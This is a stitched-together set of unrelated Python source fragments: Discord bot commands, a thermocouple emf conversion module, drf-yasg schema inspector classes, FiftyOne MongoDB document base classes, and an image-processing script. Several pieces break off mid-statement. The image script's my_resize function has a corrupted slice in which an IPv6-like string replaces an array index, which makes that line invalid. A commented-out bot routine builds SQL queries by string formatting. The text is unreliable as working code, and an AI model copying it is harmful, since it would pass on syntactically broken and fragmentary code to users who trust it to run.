em = discord.Embed(colour=0xC5934B)
if not lang in locale.keys():
em.description = "{who}, {response}.".format(who=tagged_dname(message.author), response="ошибка локализации")
await client.send_message(message.channel, embed=em)
return
if not const or not const["is_ud"]:
em.description = locale[lang]["global_not_available"].format(who=tagged_dname(message.author))
await client.send_message(message.channel, embed=em)
return
em = discord.Embed(colour=int(const["em_color"], 16) + 512)
icon_url = message.author.avatar_url
if not icon_url:
icon_url = message.author.default_avatar_url
em.set_footer(text=tagged_dname(message.author), icon_url=icon_url)
text = clear_text(text[:256])
url = ('https://www.urbandictionary.com/define.php')
params = {
"term": text
}
s = requests.session()
s.headers.update({'Content-Type': 'application/json'})
raw = s.get(url, params=params).text
soup = BeautifulSoup(raw, 'html5lib')
top = soup.find(class_="meaning")
if not top:
em.title = locale[lang]["error_title"]
em.description = locale[lang]["other_urban_error"]
else:
definition = top.text.strip()
if len(definition) > 1024:
definition = definition[:1021]+"..."
example = soup.find(class_="example").text.strip()
if len(example) > 1024:
example = example[:1021]+"..."
em.set_author(
name="Urban Dictionary",
icon_url="https://apprecs.org/gp/images/app-icons/300/2f/info.tuohuang.urbandict.jpg"
)
em.title = text
em.add_field(
name=locale[lang]["other_urban_def"],
value=definition,
inline=False
)
em.add_field(
name=locale[lang]["other_urban_example"],
value=example,
inline=False
)
await asyncio.wait([
client.delete_message(message),
client.send_message(message.channel, embed=em)
])
return
async def o_roll(client, conn, context, one, two):
message = context.message
server_id = message.server.id
const = await get_cached_server(conn, server_id)
lang = const["locale"]
em = discord.Embed(colour=0xC5934B)
if not lang in locale.keys():
em.description = "{who}, {response}.".format(who=tagged_dname(message.author), response="ошибка локализации")
await client.send_message(message.channel, embed=em)
return
if not const or not const["is_roll"]:
em.description = locale[lang]["global_not_available"].format(who=tagged_dname(message.author))
await client.send_message(message.channel, embed=em)
return
em = discord.Embed(colour=int(const["em_color"], 16) + 512)
temp = max([one, two])
one = min([one, two])
two = temp
count = random.randint(one, two)
em.description = locale[lang]["other_roll_response"].format(
who=tagged_dname(message.author),
count=count
)
await asyncio.wait([
client.send_message(message.channel, embed=em),
client.delete_message(message)
])
return
async def o_servers(client, conn, context, page):
message = context.message
em = discord.Embed(colour=0xC5934B)
em.title = "Top servers"
pages = int(len(client.servers)/25)+1
if page > pages:
return
em.set_footer(text="Page {} of {}".format(page, pages))
for i, server in enumerate(sorted(client.servers, key=lambda k: k.member_count, reverse=True), 1):
if i <= (page-1)*25:
continue
em.add_field(
inline=True,
name="#{} {}".format(i, server.name),
value="[{count}](https://{id}.ru \"{id}\")".format(
count=server.member_count,
id=server.id
)
)
if i % 25 == 0:
break
await asyncio.wait([
client.delete_message(message),
client.send_message(message.channel, embed=em)
])
return
# async def o_like(client, conn, context):
# message = context.message
# server_id = message.server.id
# if message.author.bot or message.channel.is_private:
# return
# const = await conn.fetchrow("SELECT * FROM settings WHERE discord_id = '{discord_id}'".format(discord_id=server_id))
# lang = const["locale"]
# em = discord.Embed(colour=0xC5934B)
# if not lang in locale.keys():
# em.description = "{who}, {response}.".format(who=tagged_dname(message.author), response="ошибка локализации")
# await client.send_message(message.channel, embed=em)
# return
# if not const or not const["is_like"]:
# em.description = locale[lang]["global_not_available"].format(who=tagged_dname(message.author))
# await client.send_message(message.channel, embed=em)
# return
# em = discord.Embed(colour=int(const["em_color"], 16) + 512)
# try:
# await client.delete_message(message)
# except:
# pass
# now = int(time.time())
# if now - const["like_time"] > 14400:
# likes = const["likes"] + const["like_one"]
# pop_cached_server(server_id)
# if likes > 99:
# likes = 1
# clear_caches()
# await conn.execute("UPDATE settings SET likes = DEFAULT, like_time = DEFAULT")
# await conn.execute("UPDATE settings SET likes = {likes}, like_time = {like_time} WHERE discord_id = '{discord_id}'".format(
# likes=likes,
# like_time=now,
# discord_id=server_id
# ))
# global top_servers
# top_servers = await conn.fetch("SELECT discord_id FROM | |
"""
Python module for computing thermocouple emf values from temperatures.
This module just contains the generic thermocouple class and helper
functions.
"""
__author__ = "<EMAIL>"
__copyright__ = "public domain"
import numpy as np
# scipy.optimize will be imported when needed.
optimize = None
def ensure_import_optimize():
global optimize
if optimize == None:
try:
import scipy.optimize as optimize
except ImportError:
raise ImportError(
"Inverse lookup requires scipy.optimize module. Please install SciPy."
)
class Polynomial_Gaussian(object):
"""\
Piecewise mathematical function of polynomials plus gaussian, used for
thermocouple reference.
Main methods:
func(T) # compute the function
func.__call__(T) # synonym for func(T)
func.inverse(F) # perform inverse lookup
The raw function parameters are stored in .table. The structure of .table
is a list of tuples giving the different segments of the piecewise function,
formatted as:
(minimum T, maximum T, polynomial coefs array, exponential coefs list)
The polynomial coefs array is in the order of np.polyval(), i.e., starting
with the highest power and ending with zeroth power (offset).
Exponential coefs are used as ec[0] * np.exp(ec[1] * (T - ec[2])**2), or
may be None in which case only the polynomial is used.
The appropriate temperature and voltage units to use when calling these
functions are assumed to be degrees Celsius and milivolts as defined in
NIST, ASTM and OMEGA reference tables.
.source and .calibration are strings containing information about where the
function data comes from, and how it is calibrated.
"""
def __init__(self, table=None, invtable=None, source="", calibration=""):
self.table = table
self.invtable = invtable
self.source = source
self.calibration = calibration
# check table
lastmax = table[0][0]
for tmin, tmax, _, _ in table:
if not tmin <= tmax:
raise ValueError("Temperature limits must be in ascending order.")
if tmin != lastmax:
raise ValueError("Pieces' limits must be contiguous.")
lastmax = tmax
@property
def minT(self):
return self.table[0][0]
@property
def maxT(self):
return self.table[-1][1]
@property
def minV(self):
return self.invtable[0][0]
@property
def maxV(self):
return self.invtable[-1][1]
def __repr__(self):
return (
"<piecewise polynomial+gaussian, domain %g to %g in ºC, output in mV; %s calibrated, from %s>"
% (self.minT, self.maxT, self.calibration, self.source,)
)
def __call__(self, T, derivative=0, out_of_range="raise"):
"""\
Calculate reference function at given temperature.
Parameters
----------
T : array_like
Temperature or array of temperatures.
derivative: integer
Use this parameter to evaluate the functional derivative of the emf
function at a given temperature. Default is derivative=0 (no derivative).
out_of_range: string, optional
Determines behaviour for out of range temperatures.
"raise": raises an ValueError exception. (default)
"nan": values replaced by nans.
"extrapolate": extrapolates from closest range. Do not trust this!
Returns
-------
emf : array_like
computed emf function
"""
if out_of_range not in ["raise", "nan", "extrapolate"]:
raise ValueError("invalid out_of_range parameter", out_of_range)
T = np.array(T, copy=False, order="A")
emf_choices = [None]
# We go through the table, determining the selector which is used
# to choose which piece of the piecewise function to use.
# selector = 0 where T is underrange,
# selector = 1 where T is in first range,
# ...
# selector = N where T is in last (Nth) range,
# selector = N+1 where T is overrange.
tmin = self.minT
selector = (T >= tmin) * 1
for tmin, tmax, coefs, ec in self.table:
selector += T > tmax
# Here we go ahead and compute emf values using all ranges.
# this is simple but perhaps a bit inefficient.
emf = np.polyval(np.polyder(coefs, derivative), T)
if ec:
# Type K thermocouple has this annoying exponential addition term,
# corresponding to a little bump at 127 Celsius.
dT = T - ec[2]
gauss = ec[0] * np.exp(ec[1] * dT ** 2)
if derivative == 0:
emf += gauss
elif derivative == 1:
emf += 2.0 * ec[1] * gauss * dT
elif derivative == 2:
emf += 2.0 * ec[1] * gauss * (2.0 * ec[1] * dT ** 2 + 1.0)
elif derivative == 3:
emf += (
4.0 * ec[1] * ec[1] * gauss * dT * (2.0 * ec[1] * dT ** 2 + 3.0)
)
else:
raise ValueError(
"sorry, derivatives > 3 not supported for this type."
)
emf_choices.append(emf)
emf_choices.append(None)
if out_of_range == "nan":
emf_choices[0] = T * np.nan
emf_choices[-1] = emf_choices[0]
else:
emf_choices[0] = emf_choices[1]
emf_choices[-1] = emf_choices[-2]
if out_of_range == "raise":
unders = selector <= 0
overs = selector > len(self.table)
if np.any(unders) or np.any(overs):
u_temps = np.extract(unders, T)
o_temps = np.extract(overs, T)
if u_temps.size == 0:
u_temps = None
if o_temps.size == 0:
o_temps = None
msg = "Temperatures (ºC) under or over range:"
raise ValueError(msg, u_temps, o_temps)
return np.choose(selector, emf_choices)
def refinv(self, V):
"""\
Calculate temperature at given voltage using reference
inverse polynomial function.
Parameters
----------
V : array_like
Voltage or array of voltages.
Returns
-------
t : array_like
computed t function
"""
V = np.array(V, copy=False, order="A")
t_choices = [None]
vmin = self.minV
selector = (V >= vmin) * 1
for vmin, vmax, coefs, _ in self.invtable:
selector += V > vmax
t = np.polyval(coefs, V)
t_choices.append(t)
t_choices.append(None)
t_choices[0] = t_choices[1]
t_choices[-1] = t_choices[-2]
return np.choose(selector, t_choices)
def inverse(self, V, Tstart=None, Vtol=1e-6):
"""
Find the temperature corresponding to a given voltage, via zero-finding.
Parameters
----------
V: float
Measured voltage (in milivolts) goes here.
Tstart: float
Suggested starting temperature for search. Defaults to reference
inverse function or midpoint of range.
Vtol: float
Desired absolute tolerance of voltage value.
Returns
-------
T: float
Temperature T, such that func(T) = V
If the solution does not converge within |func(T) - V| > Vtol,
an exception is raised.
Note on implementation
----------------------
First checks if func(Tstart) is close enough to V;
If this fails, try to use scipy.optimize.newton;
Failing that, use scipy.optimize.brentq.
This function requires scipy to be installed when using scipy.optimize.
It will attemp to import it upon the first usage.
"""
V = float(V)
if Tstart == None:
if self.invtable == None:
Tstart = 0.5 * (self.minT + self.maxT)
else:
Tstart = self.refinv(V)
if abs(self(Tstart, out_of_range="extrapolate") - V) <= Vtol:
return Tstart
ensure_import_optimize()
fun0 = lambda T: self(T, out_of_range="extrapolate") - V
fun1 = lambda T: self(T, derivative=1, out_of_range="extrapolate")
fun2 = lambda T: self(T, derivative=2, out_of_range="extrapolate")
try:
T = optimize.newton(fun0, Tstart, fprime=fun1, fprime2=fun2, tol=Vtol)
if abs(self(T, out_of_range="extrapolate") - V) > Vtol:
raise ValueError
except:
try:
T = optimize.brentq(fun0, self.minT, self.maxT)
except ValueError as e:
if e.args == ("f(a) and f(b) must have different signs",):
raise ValueError("Voltage not within in allowed range.")
else:
raise
if not abs(self(T, out_of_range="extrapolate") - V) <= Vtol:
raise ValueError("Did not converge within tolerance.")
return T
class Thermocouple(object):
"""
Thermocouple helper object. This object provides practical
methods for converting between temperatures and measured voltages:
* ``.emf(T)`` returns voltage from known temperature.
* ``.t(V)`` returns temperature from known voltage.
Units according to reference tables - milivolt and degree Celsius
In each case it is possible (and desirable) to pass in the reference
junction temperature by the keyword argument Tref.
"""
def __init__(self, func, ttype=""):
"""
func is the object that contains the actual function information, and has
methods __call__, inverse, and attributes .minT, .maxT.
"""
self.func = func
self.type = ttype
def __repr__(self):
rng = "%.1f ºC to %.1f ºC" % (self.func.minT, self.func.maxT)
return "<%s thermocouple reference (%s)>" % (self.type, rng)
@property
def minT(self):
return self.func.minT
@property
def maxT(self):
return self.func.maxT
def emfr(self, T, Tref=0.0, derivative=0, out_of_range="raise"):
"""
Compute reference electromotive force for given thermocouple measurement
junction temperature and given reference junctions temperature.
Parameters
----------
T : array_like
Temperature or array of temperatures (in ºC).
Tref : float, optional
Reference junctions' temperature (in ºC), defaults to 0.0.
If derivative != 0, Tref is irrelevant.
derivative : integer, optional
Use this parameter to evaluate the functional derivative of
the emf function at a given temperature.
defaults to derivative=0 (no derivative).
out_of_range : {'raise', 'nan', 'extrapolate'}, optional
Determines behaviour for out of range temperatures: raise an
exception, return NaNs, or extrapolate | |
<reponame>onegreyonewhite/drf-yasg
import inspect
import logging
from rest_framework import serializers
from .. import openapi
from ..utils import force_real_str, get_field_default, get_object_classes, is_list_view
#: Sentinel value that inspectors must return to signal that they do not know how to handle an object
NotHandled = object()
logger = logging.getLogger(__name__)
def is_callable_method(cls_or_instance, method_name):
method = getattr(cls_or_instance, method_name)
if inspect.ismethod(method) and getattr(method, '__self__', None):
# bound classmethod or instance method
return method, True
try:
# inspect.getattr_static was added in python 3.2
from inspect import getattr_static
# on python 3, both unbound instance methods (i.e. getattr(cls, mth)) and static methods are plain functions
# getattr_static allows us to check the type of the method descriptor; for `@staticmethod` this is staticmethod
return method, isinstance(getattr_static(cls_or_instance, method_name, None), staticmethod)
except ImportError:
# python 2 still has unbound methods, so ismethod <=> !staticmethod TODO: remove when dropping python 2.7
return method, not inspect.ismethod(method)
def call_view_method(view, method_name, fallback_attr=None, default=None):
"""Call a view method which might throw an exception. If an exception is thrown, log an informative error message
and return the value of fallback_attr, or default if not present. The method must be callable without any arguments
except cls or self.
:param view: view class or instance; if a class is passed, instance methods won't be called
:type view: rest_framework.views.APIView or type[rest_framework.views.APIView]
:param str method_name: name of a method on the view
:param str fallback_attr: name of an attribute on the view to fall back on, if calling the method fails
:param default: default value if all else fails
:return: view method's return value, or value of view's fallback_attr, or default
:rtype: any or None
"""
if hasattr(view, method_name):
try:
view_method, is_callabale = is_callable_method(view, method_name)
if is_callabale:
return view_method()
except Exception: # pragma: no cover
logger.warning("view's %s raised exception during schema generation; use "
"`getattr(self, 'swagger_fake_view', False)` to detect and short-circuit this",
type(view).__name__, exc_info=True)
if fallback_attr and hasattr(view, fallback_attr):
return getattr(view, fallback_attr)
return default
class BaseInspector(object):
def __init__(self, view, path, method, components, request):
"""
:param rest_framework.views.APIView view: the view associated with this endpoint
:param str path: the path component of the operation URL
:param str method: the http method of the operation
:param openapi.ReferenceResolver components: referenceable components
:param rest_framework.request.Request request: the request made against the schema view; can be None
"""
self.view = view
self.path = path
self.method = method
self.components = components
self.request = request
def process_result(self, result, method_name, obj, **kwargs):
"""After an inspector handles an object (i.e. returns a value other than :data:`.NotHandled`), all inspectors
that were probed get the chance to alter the result, in reverse order. The inspector that handled the object
is the first to receive a ``process_result`` call with the object it just returned.
This behaviour is similar to the Django request/response middleware processing.
If this inspector has no post-processing to do, it should just ``return result`` (the default implementation).
:param result: the return value of the winning inspector, or ``None`` if no inspector handled the object
:param str method_name: name of the method that was called on the inspector
:param obj: first argument passed to inspector method
:param kwargs: additional arguments passed to inspector method
:return:
"""
return result
def probe_inspectors(self, inspectors, method_name, obj, initkwargs=None, **kwargs):
"""Probe a list of inspectors with a given object. The first inspector in the list to return a value that
is not :data:`.NotHandled` wins.
:param list[type[BaseInspector]] inspectors: list of inspectors to probe
:param str method_name: name of the target method on the inspector
:param obj: first argument to inspector method
:param dict initkwargs: extra kwargs for instantiating inspector class
:param kwargs: additional arguments to inspector method
:return: the return value of the winning inspector, or ``None`` if no inspector handled the object
"""
initkwargs = initkwargs or {}
tried_inspectors = []
for inspector in inspectors:
assert inspect.isclass(inspector), "inspector must be a class, not an object"
assert issubclass(inspector, BaseInspector), "inspectors must subclass BaseInspector"
inspector = inspector(self.view, self.path, self.method, self.components, self.request, **initkwargs)
tried_inspectors.append(inspector)
method = getattr(inspector, method_name, None)
if method is None:
continue
result = method(obj, **kwargs)
if result is not NotHandled:
break
else: # pragma: no cover
logger.warning("%s ignored because no inspector in %s handled it (operation: %s)",
obj, inspectors, method_name)
result = None
for inspector in reversed(tried_inspectors):
result = inspector.process_result(result, method_name, obj, **kwargs)
return result
def get_renderer_classes(self):
"""Get the renderer classes of this view by calling `get_renderers`.
:return: renderer classes
:rtype: list[type[rest_framework.renderers.BaseRenderer]]
"""
return get_object_classes(call_view_method(self.view, 'get_renderers', 'renderer_classes', []))
def get_parser_classes(self):
"""Get the parser classes of this view by calling `get_parsers`.
:return: parser classes
:rtype: list[type[rest_framework.parsers.BaseParser]]
"""
return get_object_classes(call_view_method(self.view, 'get_parsers', 'parser_classes', []))
class PaginatorInspector(BaseInspector):
"""Base inspector for paginators.
Responisble for determining extra query parameters and response structure added by given paginators.
"""
def get_paginator_parameters(self, paginator):
"""Get the pagination parameters for a single paginator **instance**.
Should return :data:`.NotHandled` if this inspector does not know how to handle the given `paginator`.
:param BasePagination paginator: the paginator
:rtype: list[openapi.Parameter]
"""
return NotHandled
def get_paginated_response(self, paginator, response_schema):
"""Add appropriate paging fields to a response :class:`.Schema`.
Should return :data:`.NotHandled` if this inspector does not know how to handle the given `paginator`.
:param BasePagination paginator: the paginator
:param openapi.Schema response_schema: the response schema that must be paged.
:rtype: openapi.Schema
"""
return NotHandled
class FilterInspector(BaseInspector):
"""Base inspector for filter backends.
Responsible for determining extra query parameters added by given filter backends.
"""
def get_filter_parameters(self, filter_backend):
"""Get the filter parameters for a single filter backend **instance**.
Should return :data:`.NotHandled` if this inspector does not know how to handle the given `filter_backend`.
:param BaseFilterBackend filter_backend: the filter backend
:rtype: list[openapi.Parameter]
"""
return NotHandled
class FieldInspector(BaseInspector):
"""Base inspector for serializers and serializer fields. """
def __init__(self, view, path, method, components, request, field_inspectors):
super(FieldInspector, self).__init__(view, path, method, components, request)
self.field_inspectors = field_inspectors
def add_manual_fields(self, serializer_or_field, schema):
"""Set fields from the ``swagger_schem_fields`` attribute on the Meta class. This method is called
only for serializers or fields that are converted into ``openapi.Schema`` objects.
:param serializer_or_field: serializer or field instance
:param openapi.Schema schema: the schema object to be modified in-place
"""
meta = getattr(serializer_or_field, 'Meta', None)
swagger_schema_fields = getattr(meta, 'swagger_schema_fields', {})
if swagger_schema_fields:
for attr, val in swagger_schema_fields.items():
setattr(schema, attr, val)
def field_to_swagger_object(self, field, swagger_object_type, use_references, **kwargs):
"""Convert a drf Serializer or Field instance into a Swagger object.
Should return :data:`.NotHandled` if this inspector does not know how to handle the given `field`.
:param rest_framework.serializers.Field field: the source field
:param type[openapi.SwaggerDict] swagger_object_type: should be one of Schema, Parameter, Items
:param bool use_references: if False, forces all objects to be declared inline
instead of by referencing other components
:param kwargs: extra attributes for constructing the object;
if swagger_object_type is Parameter, ``name`` and ``in_`` should be provided
:return: the swagger object
:rtype: openapi.Parameter or openapi.Items or openapi.Schema or openapi.SchemaRef
"""
return NotHandled
def probe_field_inspectors(self, field, swagger_object_type, use_references, **kwargs):
"""Helper method for recursively probing `field_inspectors` to handle a given field.
All arguments are the same as :meth:`.field_to_swagger_object`.
:rtype: openapi.Parameter or openapi.Items or openapi.Schema or openapi.SchemaRef
"""
return self.probe_inspectors(
self.field_inspectors, 'field_to_swagger_object', field, {'field_inspectors': self.field_inspectors},
swagger_object_type=swagger_object_type, use_references=use_references, **kwargs
)
def _get_partial_types(self, field, swagger_object_type, use_references, **kwargs):
"""Helper method to extract generic information from a field and return a partial constructor for the
appropriate openapi object.
All arguments are the same as :meth:`.field_to_swagger_object`.
The return value is a tuple consisting of:
* a function for constructing objects of `swagger_object_type`; its prototype is: ::
def SwaggerType(existing_object=None, **instance_kwargs):
This function creates an instance of `swagger_object_type`, passing the following attributes to its init,
in order of precedence:
- arguments specified by the ``kwargs`` parameter of :meth:`._get_partial_types`
- ``instance_kwargs`` passed to the constructor function
- ``title``, ``description``, ``required``, ``x-nullable`` and ``default`` inferred from the field,
where appropriate
If ``existing_object`` is not ``None``, it is updated instead of creating a new object.
* a type that should be used for child objects if `field` is of an array type. This can currently have two
values:
- :class:`.Schema` if `swagger_object_type` is :class:`.Schema`
- :class:`.Items` if `swagger_object_type` is :class:`.Parameter` or :class:`.Items`
:rtype: | |
"""
Base classes for documents that back dataset contents.
| Copyright 2017-2021, Voxel51, Inc.
| `voxel51.com <https://voxel51.com/>`_
|
"""
from copy import deepcopy
import json
import re
from bson import json_util, ObjectId
import mongoengine
import pymongo
import fiftyone.core.utils as fou
import eta.core.serial as etas
class SerializableDocument(object):
"""Mixin for documents that can be serialized in BSON or JSON format."""
def __str__(self):
return self.__repr__()
def __repr__(self):
return self.fancy_repr()
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
return self.to_dict() == other.to_dict()
def fancy_repr(
self,
class_name=None,
select_fields=None,
exclude_fields=None,
**kwargs
):
"""Generates a customizable string representation of the document.
Args:
class_name (None): optional class name to use
select_fields (None): iterable of field names to restrict to
exclude_fields (None): iterable of field names to exclude
**kwargs: additional key-value pairs to include in the string
representation
Returns:
a string representation of the document
"""
d = {}
for f in self._get_repr_fields():
if (select_fields is not None and f not in select_fields) or (
exclude_fields is not None and f in exclude_fields
):
continue
if not f.startswith("_"):
value = getattr(self, f)
if isinstance(value, ObjectId):
d[f] = str(value)
else:
d[f] = value
d.update(kwargs)
doc_name = class_name or self.__class__.__name__
doc_str = fou.pformat(d)
return "<%s: %s>" % (doc_name, doc_str)
def has_field(self, field_name):
"""Determines whether the document has a field of the given name.
Args:
field_name: the field name
Returns:
True/False
"""
raise NotImplementedError("Subclass must implement `has_field()`")
def get_field(self, field_name):
"""Gets the field of the document.
Args:
field_name: the field name
Returns:
the field value
Raises:
AttributeError: if the field does not exist
"""
raise NotImplementedError("Subclass must implement `get_field()`")
def set_field(self, field_name, value, create=False):
"""Sets the value of a field of the document.
Args:
field_name: the field name
value: the field value
create (False): whether to create the field if it does not exist
Raises:
ValueError: if ``field_name`` is not an allowed field name or does
not exist and ``create == False``
"""
raise NotImplementedError("Subclass must implement `set_field()`")
def clear_field(self, field_name):
"""Clears the field from the document.
Args:
field_name: the field name
Raises:
ValueError: if the field does not exist
"""
raise NotImplementedError("Subclass must implement `clear_field()`")
def _get_field_names(self, include_private=False):
"""Returns an ordered tuple of field names of this document.
Args:
include_private (False): whether to include private fields
Returns:
a tuple of field names
"""
raise NotImplementedError("Subclass must implement `_get_field_names`")
def _get_repr_fields(self):
"""Returns an ordered tuple of field names that should be included in
the ``repr`` of the document.
Returns:
a tuple of field names
"""
raise NotImplementedError("Subclass must implement `_get_repr_fields`")
def copy(self):
"""Returns a deep copy of the document.
Returns:
a :class:`SerializableDocument`
"""
return deepcopy(self)
def to_dict(self, extended=False):
"""Serializes this document to a BSON/JSON dictionary.
Args:
extended (False): whether to serialize extended JSON constructs
such as ObjectIDs, Binary, etc. into JSON format
Returns:
a dict
"""
raise NotImplementedError("Subclass must implement `to_dict()`")
@classmethod
def from_dict(cls, d, extended=False):
"""Loads the document from a BSON/JSON dictionary.
Args:
d: a dictionary
extended (False): whether the input dictionary may contain
serialized extended JSON constructs
Returns:
a :class:`SerializableDocument`
"""
raise NotImplementedError("Subclass must implement `from_dict()`")
def to_json(self, pretty_print=False):
"""Serializes the document to a JSON string.
Args:
pretty_print (False): whether to render the JSON in human readable
format with newlines and indentations
Returns:
a JSON string
"""
d = self.to_dict(extended=True)
return etas.json_to_str(d, pretty_print=pretty_print)
@classmethod
def from_json(cls, s):
"""Loads the document from a JSON string.
Returns:
a :class:`SerializableDocument`
"""
d = json_util.loads(s)
return cls.from_dict(d, extended=False)
class SampleDocument(SerializableDocument):
"""Interface for sample backing documents."""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
@property
def media_type(self):
"""The media type of the sample."""
raise NotImplementedError("Subclass must implement `media_type`")
@property
def collection_name(self):
"""The name of the MongoDB collection to which this sample belongs, or
``None`` if it has not been added to a dataset.
"""
return None
@property
def in_db(self):
"""Whether the sample has been added to the database."""
return False
@property
def ingest_time(self):
"""The time the sample was added to the database, or ``None`` if it
has not been added to the database.
"""
return None
class MongoEngineBaseDocument(SerializableDocument):
"""Mixin for all ``mongoengine.base.BaseDocument`` subclasses that
implements the :class:`SerializableDocument` interface.
"""
def __delattr__(self, field_name):
self.clear_field(field_name)
def __delitem__(self, field_name):
self.clear_field(field_name)
def __deepcopy__(self, memo):
# pylint: disable=no-member, unsubscriptable-object
kwargs = {
f: deepcopy(self[f], memo)
for f in self._fields_ordered
if f not in ("_cls", "_id", "id")
}
return self.__class__(**kwargs)
def has_field(self, field_name):
return field_name in self._fields_ordered
def get_field(self, field_name):
return getattr(self, field_name)
def set_field(self, field_name, value, create=False):
if not create and not self.has_field(field_name):
raise ValueError("Document has no field '%s'" % field_name)
setattr(self, field_name, value)
def clear_field(self, field_name):
if not self.has_field(field_name):
raise ValueError("Document has no field '%s'" % field_name)
super().__delattr__(field_name)
# pylint: disable=no-member
if field_name not in self.__class__._fields_ordered:
self._fields_ordered = tuple(
f for f in self._fields_ordered if f != field_name
)
def field_to_mongo(self, field_name):
# pylint: disable=no-member
value = self.get_field(field_name)
return self._fields[field_name].to_mongo(value)
def field_to_python(self, field_name, value):
# pylint: disable=no-member
return self._fields[field_name].to_python(value)
def _get_field_names(self, include_private=False):
if not include_private:
return tuple(
f for f in self._fields_ordered if not f.startswith("_")
)
return self._fields_ordered
def _get_repr_fields(self):
# pylint: disable=no-member
return self._fields_ordered
def to_dict(self, extended=False):
if extended:
return json.loads(self._to_json())
return json_util.loads(self._to_json())
@classmethod
def from_dict(cls, d, extended=False):
if not extended:
try:
# Attempt to load the document directly, assuming it is in
# extended form
# pylint: disable=no-member
return cls._from_son(d)
except Exception:
pass
# pylint: disable=no-member
bson_data = json_util.loads(json_util.dumps(d))
return cls._from_son(bson_data)
def _to_json(self):
# @todo(Tyler) mongoengine snippet, to be replaced
# pylint: disable=no-member
return json_util.dumps(self.to_mongo(use_db_field=True))
class BaseDocument(MongoEngineBaseDocument):
"""Base class for documents that are written to the database in their own
collections.
The ID of a document is automatically populated when it is added to the
database, and the ID of a document is ``None`` if it has not been added to
the database.
Attributes:
id: the ID of the document, or ``None`` if it has not been added to the
database
"""
def __eq__(self, other):
# pylint: disable=no-member
if self.id != other.id:
return False
return super().__eq__(other)
def _get_repr_fields(self):
# pylint: disable=no-member
return ("id",) + tuple(f for f in self._fields_ordered if f != "id")
@property
def ingest_time(self):
"""The time the document was added to the database, or ``None`` if it
has not been added to the database.
"""
# pylint: disable=no-member
return self.id.generation_time if self.in_db else None
@property
def in_db(self):
"""Whether the underlying :class:`fiftyone.core.odm.Document` has
been inserted into the database.
"""
# pylint: disable=no-member
return self.id is not None
class BaseEmbeddedDocument(MongoEngineBaseDocument):
"""Base class for documents that are embedded within other documents and
therefore are not stored in their own collection in the database.
"""
pass
class Document(BaseDocument, mongoengine.Document):
"""Base class for documents that are stored in a MongoDB collection.
The ID of a document is automatically populated when it is added to the
database, and the ID of a document is ``None`` if it has not been added to
the database.
Attributes:
id: the ID of the document, or ``None`` if it has not been added to the
database
"""
meta = {"abstract": True}
def save(self, validate=True, clean=True, **kwargs):
"""Save the :class:`Document` to the database.
If the document already exists, it will be updated, otherwise it will
be created.
Args:
validate (True): validates the document
clean (True): call the document's clean method; requires
``validate`` to be True
Returns:
self
"""
# pylint: disable=no-member
if self._meta.get("abstract"):
raise mongoengine.InvalidDocumentError(
"Cannot save an abstract document."
)
if validate:
self.validate(clean=clean)
doc_id = self.to_mongo(fields=[self._meta["id_field"]])
created = "_id" not in doc_id or self._created
# It might be refreshed by the pre_save_post_validation hook, e.g., for
# etag generation
doc = self.to_mongo()
if self._meta.get("auto_create_index", True):
self.ensure_indexes()
try:
# Save a new document or update an existing one
if created:
# Save new document
# insert_one will provoke UniqueError alongside save does not
# therefore, it need to catch and call replace_one.
collection = self._get_collection()
object_id = None
if "_id" in doc:
raw_object = collection.find_one_and_replace(
{"_id": doc["_id"]}, doc
)
if raw_object:
object_id = doc["_id"]
if not object_id:
object_id = collection.insert_one(doc).inserted_id
else:
# Update existing document
object_id = doc["_id"]
created = False
updates, removals = self._delta()
update_doc = | |
<gh_stars>1-10
# coding: utf-8
import numpy
import scipy
from scipy import ndimage
import numpy as np
from scipy import misc
from PIL import Image
from pyinterp2.interp2 import interp2linear
# In[36]:
import numpy
import scipy
#noinspection PyPep8Naming
import matplotlib.pyplot as plt
# In[38]:
def rgb2gray(rgb):
#return np.dot(rgb[...,:3], [0.299, 0.587, 0.144])
return np.dot(rgb[..., :3], [0.2989, 0.5870, 0.1140]).round() #matlab's version
class MyStruct:
def __init__(self):
self.ololo = 1
#TODO: check for several sizes
#noinspection PyPep8Naming,PyPep8Naming,PyPep8Naming
def extend(I, shape):
"""
Extends image I to shape
"""
r = [0, 0]
Inew = I
for i in [0, 1]:
r = numpy.ones(Inew.shape[i], dtype='int32')
r[-1] = shape[i] - Inew.shape[i] + 1
Inew = np.repeat(Inew, r, axis=i)
return Inew
#TODO: add antialiasing to work like matlab
#noinspection PyPep8Naming
def my_resize(I, factor):
if factor != 0.5:
raise Exception("Unsupported resize factor!")
newshape = numpy.round((numpy.array(I.shape) ) / 2.).astype('int32')
#print "new shape = ", newshape
#print I[0::2,0::2].shape
#print I[0::2,1::2].shape
#print I[1::2,0::2].shape
#print I[1::2,1::2].shape
res = (
extend(I[0::2, 0::2], newshape) +
extend(I[0::2, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b], newshape) +
extend(I[1::2, 0::2], newshape) +
extend(I[1::2, 1::2], newshape)) / 4
return res
import scipy.signal
def median_filter_symmetric(x, r):
border = r
padded = numpy.pad(x, pad_width=border, mode='symmetric')
filt = scipy.signal.medfilt2d(padded, r)
cropped = filt[border:-border, border:-border]
return cropped
# In[60]:
from scipy.sparse import coo_matrix
def makeweights_helper(abs_diff, params, ):
epsilon = 1e-5
vd_min = numpy.min(abs_diff)
vd_max = numpy.max(abs_diff)
d = vd_max - vd_min
if d == 0:
d = 1.
t = (abs_diff - vd_min) / d
weights_new = numpy.exp(-(params.beta * t)) + epsilon
weights1 = params.nu + (1 - params.nu) * weights_new
#return numpy.ones(abs_diff.shape)
return weights1
def makeweights(I0_, params):
args = dict(order='F')
M, N = I0_.shape
MN = M * N
X, Y = np.meshgrid(np.arange(N), np.arange(M))
#print X, Y
abs_diff = numpy.abs(I0_[:, :-1] - I0_[:, 1:])
weights = makeweights_helper(abs_diff, params)
coords1 = numpy.vstack([Y[:, :-1].ravel(**args), X[:, :-1].ravel(**args)])
coords2 = numpy.vstack([Y[:, 1:].ravel(**args), X[:, 1:].ravel(**args)])
#print coords1
edges1 = np.ravel_multi_index(coords1, I0_.shape, **args)
edges2 = np.ravel_multi_index(coords2, I0_.shape, **args)
D1 = coo_matrix(
(
numpy.hstack([-weights.ravel(**args), weights.ravel(**args)]),
(numpy.hstack([edges1, edges1]), numpy.hstack([edges1, edges2])),
),
shape=(MN, MN)
)
abs_diff = numpy.abs(I0_[:-1, :] - I0_[1:, :])
weights = makeweights_helper(abs_diff, params)
